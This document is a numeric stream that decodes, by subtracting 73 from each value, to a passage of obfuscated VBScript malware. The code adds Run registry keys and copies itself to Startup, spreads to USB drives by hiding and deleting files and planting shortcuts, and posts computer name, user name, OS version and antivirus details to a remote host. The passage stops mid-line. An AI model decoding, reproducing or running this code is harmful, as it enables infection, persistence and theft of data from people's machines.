105$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@172$@181$@170$@188$@188$@174$@188$@165$@175$@184$@181$@173$@174$@187$@165$@173$@174$@175$@170$@190$@181$@189$@178$@172$@184$@183$@165$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@117$@107$@117$@107$@114$@105$@134$@105$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@184$@181$@173$@174$@187$@119$@185$@170$@189$@177$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@188$@170$@191$@174$@113$@114$@86$@83$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@174$@187$@187$@119$@172$@181$@174$@170$@187$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@188$@190$@171$@105$@190$@183$@178$@183$@188$@189$@170$@181$@181$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@183$@170$@182$@174$@86$@83$@173$@178$@182$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@86$@83$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@173$@174$@181$@174$@189$@174$@105$@107$@145$@148$@142$@162$@168$@140$@158$@155$@155$@142$@151$@157$@168$@158$@156$@142$@155$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@173$@174$@181$@174$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@188$@189$@170$@187$@189$@190$@185$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@189$@187$@190$@174$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@105$@117$@189$@187$@190$@174$@86$@83$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@173$@187$@178$@191$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@187$@178$@191$@174$@188$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@178$@188$@187$@174$@170$@173$@194$@105$@134$@105$@189$@187$@190$@174$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@175$@187$@174$@174$@188$@185$@170$@172$@174$@105$@105$@135$@105$@121$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@173$@187$@178$@191$@174$@189$@194$@185$@174$@105$@105$@134$@105$@122$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@175$@178$@181$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@105$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@114$@119$@175$@178$@181$@174$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@181$@172$@170$@188$@174$@105$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@113$@190$@171$@184$@190$@183$@173$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@114$@114$@114$@105$@133$@135$@105$@107$@181$@183$@180$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@121$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@190$@172$@170$@188$@174$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@114$@105$@133$@135$@105$@190$@172$@170$@188$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@183$@170$@182$@174$@105$@134$@105$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@175$@178$@181$@174$@183$@170$@182$@174$@113$@121$@114$@105$@111$@105$@107$@119$@181$@183$@180$@107$@105$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@175$@178$@181$@174$@119$@183$@170$@182$@174$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@146$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@175$@178$@181$@174$@119$@185$@170$@189$@177$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@175$@184$@181$@173$@174$@187$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@114$@119$@188$@190$@171$@175$@184$@181$@173$@174$@187$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@121$@86$@83$@105$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@185$@184$@188$@189$@105$@113$@172$@182$@173$@105$@117$@185$@170$@187$@170$@182$@114$@86$@83$@86$@83$@185$@184$@188$@189$@105$@134$@105$@185$@170$@187$@170$@182$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@187$@189$@105$@111$@107$@120$@107$@105$@111$@105$@172$@182$@173$@117$@105$@175$@170$@181$@188$@174$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@188$@174$@189$@187$@174$@186$@190$@174$@188$@189$@177$@174$@170$@173$@174$@187$@105$@107$@190$@188$@174$@187$@118$@170$@176$@174$@183$@189$@131$@107$@117$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@188$@174$@183$@173$@105$@185$@170$@187$@170$@182$@86$@83$@185$@184$@188$@189$@105$@134$@105$@177$@189$@189$@185$@184$@171$@179$@119$@187$@174$@188$@185$@184$@183$@188$@174$@189$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@178$@175$@105$@105$@178$@183$@175$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@177$@192$@178$@173$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@105$@111$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@172$@184$@182$@185$@190$@189$@174$@187$@183$@170$@182$@174$@110$@107$@114$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@105$@111$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@190$@188$@174$@187$@183$@170$@182$@174$@110$@107$@114$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@187$@184$@184$@189$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@184$@188$@105$@134$@105$@187$@184$@184$@189$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@105$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@184$@185$@174$@187$@170$@189$@178$@183$@176$@188$@194$@188$@189$@174$@182$@107$@114$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@188$@178$@183$@175$@184$@105$@178$@183$@105$@184$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@184$@188$@178$@183$@175$@184$@119$@172$@170$@185$@189$@178$@184$@183$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@107$@185$@181$@190$@188$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@86$@83$@105$@105$@105$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@105$@134$@105$@178$@183$@175$@105$@105$@86$@83$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@105$@134$@105$@178$@183$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@190$@185$@188$@189$@170$@187$@189$@105$@113$@114$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@151$@174$@193$@189$@86$@83$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@140$@158$@155$@155$@142$@151$@157$@168$@158$@156$@142$@155$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@117$@105$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@117$@105$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@189$@187$@190$@174$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@188$@189$@170$@187$@189$@190$@185$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@189$@187$@190$@174$@86$@83$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@177$@192$@178$@173$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@189$@105$@187$@184$@184$@189$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@173$@178$@188$@180$@188$@105$@134$@105$@187$@184$@184$@189$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@105$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@181$@184$@176$@178$@172$@170$@181$@173$@178$@188$@180$@107$@114$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@173$@178$@188$@180$@105$@178$@183$@105$@173$@178$@188$@180$@188$@86$@83$@105$@105$@105$@105$@178$@175$@105$@105$@173$@178$@188$@180$@119$@191$@184$@181$@190$@182$@174$@188$@174$@187$@178$@170$@181$@183$@190$@182$@171$@174$@187$@105$@133$@135$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@177$@192$@178$@173$@105$@134$@105$@173$@178$@188$@180$@119$@191$@184$@181$@190$@182$@174$@188$@174$@187$@178$@170$@181$@183$@190$@182$@171$@174$@187$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@172$@190$@187$@178$@189$@194$@105$@134$@105$@107$@107$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@172$@184$@181$@178$@189$@174$@182$@188$@105$@134$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@184$@185$@174$@187$@170$@189$@178$@183$@176$@188$@194$@188$@189$@174$@182$@107$@117$@117$@125$@129$@114$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@178$@189$@174$@182$@105$@178$@183$@105$@172$@184$@181$@178$@189$@174$@182$@188$@86$@83$@105$@105$@105$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@184$@171$@179$@178$@189$@174$@182$@119$@191$@174$@187$@188$@178$@184$@183$@117$@107$@119$@107$@114$@86$@83$@183$@174$@193$@189$@86$@83$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@172$@184$@181$@178$@189$@174$@182$@188$@119$@191$@174$@187$@188$@178$@184$@183$@117$@107$@119$@107$@114$@86$@83$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@113$@121$@114$@105$@111$@105$@107$@119$@107$@86$@83$@175$@184$@187$@105$@105$@193$@105$@134$@105$@122$@105$@189$@184$@105$@190$@171$@184$@190$@183$@173$@105$@113$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@114$@86$@83$@82$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@111$@105$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@113$@178$@114$@86$@83$@183$@174$@193$@189$@86$@83$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@174$@191$@170$@181$@105$@113$@184$@188$@191$@174$@187$@188$@178$@184$@183$@114$@86$@83$@178$@175$@105$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@135$@105$@127$@105$@189$@177$@174$@183$@105$@188$@172$@105$@134$@105$@107$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@123$@107$@105$@174$@181$@188$@174$@105$@188$@172$@105$@134$@105$@107$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@107$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@165$@165$@181$@184$@172$@170$@181$@177$@184$@188$@189$@165$@187$@184$@184$@189$@165$@107$@105$@111$@105$@188$@172$@114$@86$@83$@156$@174$@189$@105$@172$@184$@181$@170$@183$@189$@178$@191$@178$@187$@190$@188$@105$@134$@105$@184$@171$@179$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@170$@183$@189$@178$@191$@178$@187$@190$@188$@185$@187$@184$@173$@190$@172$@189$@107$@117$@107$@192$@186$@181$@107$@117$@121$@114$@86$@83$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@170$@183$@189$@178$@191$@178$@187$@190$@188$@105$@178$@183$@105$@172$@184$@181$@170$@183$@189$@178$@191$@178$@187$@190$@188$@86$@83$@105$@105$@105$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@111$@105$@184$@171$@179$@170$@183$@189$@178$@191$@178$@187$@190$@188$@119$@173$@178$@188$@185$@181$@170$@194$@183$@170$@182$@174$@105$@111$@105$@107$@105$@119$@107$@86$@83$@183$@174$@193$@189$@86$@83$@178$@175$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@107$@183$@170$@183$@118$@170$@191$@107$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@178$@183$@188$@189$@170$@183$@172$@174$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@111$@105$@107$@165$@107$@114$@86$@83$@178$@175$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@178$@175$@105$@181$@172$@170$@188$@174$@105$@113$@105$@182$@178$@173$@113$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@123$@114$@114$@105$@134$@105$@107$@131$@165$@107$@105$@111$@105$@105$@181$@172$@170$@188$@174$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@189$@187$@190$@174$@105$@118$@105$@107$@105$@111$@105$@173$@170$@189$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@105$@111$@105$@107$@165$@107$@117$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@105$@105$@105$@174$@181$@